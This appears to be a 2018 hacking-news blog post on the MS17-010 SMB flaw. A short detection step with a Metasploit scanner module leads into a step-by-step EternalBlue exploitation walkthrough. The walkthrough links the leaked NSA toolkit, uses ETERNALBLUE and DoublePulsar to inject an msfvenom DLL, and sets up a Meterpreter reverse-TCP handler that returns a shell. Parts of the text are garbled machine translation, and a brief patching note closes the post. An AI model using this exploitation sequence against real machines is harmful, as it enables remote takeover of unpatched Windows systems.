Hacking News Kcov4na

Published on May 14th, 2018 | Post Views: 3,281  HitsPost Views

0

Detect MS17-010 SMB vulnerability using Metasploit

Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server.

To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.

Detect MS17-010 SMB vulnerability using Metasploit

  1. Update Metasploit
    apt-get update && apt-get upgrade
  2. Open msfconsole, use module auxiliary/scanner/smb/smb_ms17_010. Set RHOSTS and RPORT parameter.
    Module info:

    ▼Advertisment

    Uses information disclosure to determine if MS17-010 has been patched or not.
    Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.
    If the status returned is “STATUS_INSUFF_SERVER_RESOURCES”, the machine does
    not have the MS17-010 patch.
    If the machine is missing the MS17-010 patch, the module will check for an
    existing DoublePulsar (ring 0 shellcode/malware) infection.
    This module does not require valid SMB credentials in default server
    configurations. It can log on as the user “\” and connect to IPC$.

  3. How to exploit,

Shadow Brokers shocked the world once again leaked a confidential document, which contains a number of beautifully Windows remote exploits that can cover a large number of Windows servers, Windows servers almost all across the board overnight exposure to risk.

What is MS-17-010?

Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server.

To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.

Update 7/11/2017

Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 – ‘EternalBlue’ SMB Remote Code Execution. Download here.

Update 5/18/2017

Github worawit user ported Eternalblue exploitation to work on Windows 8/Server 2012. Download here.

Update 4/28/2017

The ETERNALBLUE module in the tool is a vulnerability exploit program that can exploit the open 445 port of the Windows machine, this article has exploited the exploit:

1.NSA disclosure tool download:

https://github.com/x0rz/EQGRP_Lost_in_Translation

2. Installation

  • python 2.6
  • pywin32

Configuration environment,in EQGRP_Lost_in_Translation downloaded to the file extract, find \windows\fb.py, the following two parts of the comment.

3. Environment

  • Attacker machine: IP: 192.168.71.130, OS: Kali Linux /  IP:192.168.71.133,OS: winserver 2008 32bit
  • Target machine: IP: 192.168.199.107, OS: win7 64bit

4. Exploit

Run fb.py

set the attack IP address 192.168.199.107, callback address 192.168.71.133

Next enter the command:

useETERNALBLUE

Followed by fill in the relevant parameters, overtime and other default parameters can be a direct carriage return:

▼Advertisment

As the target is win7 system, select the target system information 1: win72k8r2

Mode selection 1: FB

Confirmation of information, execution

After successful, then run use Doublepulsar:

And fill in the parameters in turn, pay attention to the choice of function 2, rundll

in the attack machine, msfvenom generated attack dll

▼Advertisment

Then execute:

$ msfconsole
msf > useexploit/multi/handler
msf > set LHOST192.168.71.130
msf > set LPORT 5555
msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp
msf > exploit

▼Advertisment

At the same time will be generated by the upload.dll to attack aircraft 1 (192.168.71.133), back to attack aircraft 1, fill in the attack dll path:

Followed by a carriage return, the implementation of the attack

On Kali Linux machine, get shell back

How to fix

Microsoft said it has patched the Windows breakup released by the Shadow Brokers team. May come from the National Security Agency’s hacker tool released online yesterday, Microsoft can test and confirm that the patch has been available for all currently supported versions of Windows. This means that older Windows XP or Windows Vista systems may still be vulnerable to the three vulnerabilities that are released, but Microsoft is not likely to provide patches for older versions of Windows because Microsoft does not support it. Please update the patch in time, and close the necessary 139,445,3389 port.












Leave a Reply

Back to Top ↑